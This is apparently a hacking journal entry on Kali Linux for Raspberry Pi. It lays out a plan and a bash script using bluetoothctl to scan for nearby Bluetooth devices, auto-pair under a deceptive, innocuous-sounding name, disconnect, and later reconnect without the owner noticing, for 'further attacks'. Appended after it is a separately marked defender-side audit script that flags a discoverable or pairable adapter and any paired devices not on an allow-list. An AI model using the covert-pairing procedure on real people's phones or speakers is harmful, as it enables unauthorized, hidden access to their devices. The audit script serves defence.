Raspberry Pi 3 – Kali Linux – Bluetooth Hacking Journal 4 – Automated Scanning and Connecting

Program Logic

  1. Scan for bluetooth devices continuously
  2. Connect to new mac addresses automatically until pairing is accepted
    • Call your bluetooth something not so suspicious. For example, ‘Wilmu bluetooth terms of service’
  3. Immediately disconnect once connected; from then on the device will pair without being in discoverable mode
  4. Wait five minutes, so that by then the user of the bluetooth device has stopped trying to put it in discoverable mode and/or pair it with things, and is no longer using it
  5. Reconnect; if it’s a cell phone, the user will have no indication that it has been reconnected. You can now connect to this device without the user knowing.

Program in Development

#!/bin/bash
#The purpose of this tool is to automatically scan an area for bluetooth devices and to try and connect to them. After a successful connection it will immediately disconnect and record devices that have been successfully connected to for the purpose of further attacks using other programs or manual attacks. Typically, once the mac for a bluetooth device has been discovered, connections can be manually attempted via bluetoothctl connect command, even if the bluetooth device is no longer in a discoverable mode. If the target device is successfully connected, it can then typically be connected to at a later time without the owner knowing as there will be no additional security checks. This has been tested using an android cell phone and rukus bluetooth speakers.

#Chose not to do the below because once data is removed from bluetoothctl you can no longer connect to devices that were detected.
#All pre-existing devices are removed from bluetoothctl so that anything found won't be mistaken for something that is old.
#echo
#echo ------- removing all previously found devices on bluetoothctl
#echo
#echo "remove *" | bluetoothctl
#sleep 1
#Scan is turned off initially because, if it is already on, "scan on" will not start a new scan and find new bluetooth devices.
echo
echo ------- turning bluetoothctl scan off
echo
echo "scan off" | bluetoothctl
sleep 1
#turn scan on and wait 10 seconds for it to run and search nearby devices.
echo
echo ------- turning bluetoothctl scan on
echo
echo "scan on" | bluetoothctl
sleep 10
#removes the already existing devices.txt file if there is one, otherwise the devices.txt file will just get appended to and we only want to make an array using new bluetooth addresses. We don't want the array to contain bluetooth macs for devices that may no longer be in the area.
echo
echo ------- removing devices.txt
sleep 1
echo
rm -f devices.txt
#run bluetoothctl scan and export the mac addresses found, minus xx:xx:xx:xx:xx:xx (redacted) which is the raspberry's mac, into a text file called devices.txt
echo
echo ------- scanning for bluetooth devices and generating a new devices.txt list
sleep 1
echo
echo "scan on" | bluetoothctl | awk '$0 !~ /xx:xx:xx:xx:xx:xx/' >> devices.txt
#echo "devices" | bluetoothctl | awk '$0 !~ /Controller/' >> devices.txt
#hcitool scan >> devices.txt
sleep 10
#makes an array by searching for mac addresses in the devices.txt file. Each element in the array is a mac address.
echo
echo ------- making array of mac addresses found with bluetoothctl scan using devices.txt
arr=($(grep -o -E "([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}" devices.txt))
sleep 2
#says that the array is going to be printed
echo
echo ------- printing array for troubleshooting purposes
sleep 1
#prints the whole array to verify it's working
echo ${arr[*]}
echo "agent on" | bluetoothctl
echo "pair ${arr[0]}" | bluetoothctl
sleep 2
echo "yes" | bluetoothctl
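The program logic above depends on two conditions on the target side: the adapter being left discoverable/pairable long enough for an unsolicited pairing to be accepted, and the resulting pairing entry persisting unnoticed in the paired-device list. The following script is an added example, not part of the journal's program, written from the defender's side: it audits a local BlueZ adapter with bluetoothctl for exactly those two conditions. The allow-list contents and the sample bluetoothctl output embedded in it are constructed so that it also runs offline; the `show`, `devices Paired`, `info` and `remove` commands are real bluetoothctl commands, and the output format assumed is that of BlueZ 5.x.

```bash
#!/bin/bash
# Added example, not the journal's own program: a defender-side audit of a
# BlueZ adapter. It reports (1) whether the local adapter is Discoverable or
# Pairable and (2) paired devices that are not on an allow-list, for review
# with "bluetoothctl info <mac>" and removal with "bluetoothctl remove <mac>".
# The allow-list and the sample bluetoothctl output below are constructed.

mac_re='([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}'

# adapter_exposed SHOW_OUTPUT
# Succeeds (exit 0) when "bluetoothctl show" output reports
# "Discoverable: yes" or "Pairable: yes"; fails otherwise.
adapter_exposed() {
    printf '%s\n' "$1" | grep -q -E '^[[:space:]]*(Discoverable|Pairable): yes'
}

# unexpected_paired DEVICES_OUTPUT ALLOWED_MACS
# Prints each MAC from "bluetoothctl devices Paired" output that is not listed
# (one MAC per line, any case) in ALLOWED_MACS.
unexpected_paired() {
    local devices="$1" allowed="$2" mac
    printf '%s\n' "$devices" | grep -o -E "$mac_re" | while read -r mac; do
        printf '%s\n' "$allowed" | grep -q -i -x -F "$mac" || printf '%s\n' "$mac"
    done
}

# Constructed sample output, used only when bluetoothctl is not installed so
# the script also runs offline.
SAMPLE_SHOW='Controller AA:BB:CC:DD:EE:01 (public)
	Name: kali
	Powered: yes
	Discoverable: yes
	Pairable: yes'
SAMPLE_PAIRED='Device 11:22:33:44:55:66 My Headphones
Device 77:88:99:AA:BB:CC Unknown Device'
# Constructed allow-list: MACs of devices you actually paired, one per line.
ALLOWED_MACS='11:22:33:44:55:66'

audit() {
    local show paired unexpected
    if command -v bluetoothctl >/dev/null 2>&1; then
        show=$(bluetoothctl show 2>/dev/null || true)
        # BlueZ >= 5.65 filters with "devices Paired"; older releases use
        # "paired-devices" instead.
        paired=$(bluetoothctl devices Paired 2>/dev/null || true)
    else
        show="$SAMPLE_SHOW"
        paired="$SAMPLE_PAIRED"
    fi

    if adapter_exposed "$show"; then
        echo "WARNING: adapter is discoverable and/or pairable."
        echo "  Fix: bluetoothctl discoverable off; bluetoothctl pairable off"
    else
        echo "OK: adapter is neither discoverable nor pairable."
    fi

    unexpected=$(unexpected_paired "$paired" "$ALLOWED_MACS")
    if [ -n "$unexpected" ]; then
        echo "Paired devices not on the allow-list (review: bluetoothctl info <mac>; drop: bluetoothctl remove <mac>):"
        printf '  %s\n' $unexpected
    else
        echo "OK: every paired device is on the allow-list."
    fi
}

audit
```

Run it periodically (for example from cron) on any Linux host with a Bluetooth adapter; with the constructed sample data it flags the adapter as pairable and reports 77:88:99:AA:BB:CC as an unexpected pairing. The same review applies to a phone: the pairing that the journal's program leaves behind shows up in the phone's paired-device list and is removed by forgetting the device there.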